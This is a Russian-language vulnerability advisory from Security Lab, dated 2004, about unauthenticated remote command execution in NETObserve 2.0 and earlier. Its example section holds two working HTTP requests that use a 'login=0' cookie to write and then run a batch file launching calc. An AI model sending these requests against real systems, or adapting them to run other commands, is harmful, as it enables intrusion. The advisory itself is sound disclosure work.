Security Lab

Удаленное выполнение произвольного кода в NETObserve

Дата публикации:04.01.2004
Всего просмотров:1305
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: NETObserve 1.x
NETObserve 2.x
Уязвимые версии: NETObserve 2.0 и более ранние версии

Описание: Уязвимость обнаружена в NETObserve. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Удаленный пользователь может подключиться к целевой системе, используя специально обработанный HTTP заголовок, чтобы внедриться в административную сессию.

Пример/Эксплоит:

REQUEST #1:

--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0

newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------

REQUEST #2:

--------------------------------------------------------------------------
GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0


--------------------------------------------------------------------------

URL производителя: http://www.exploreanywhere.com/no-intro.php

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: NetObserve Security Bypass Vulnerability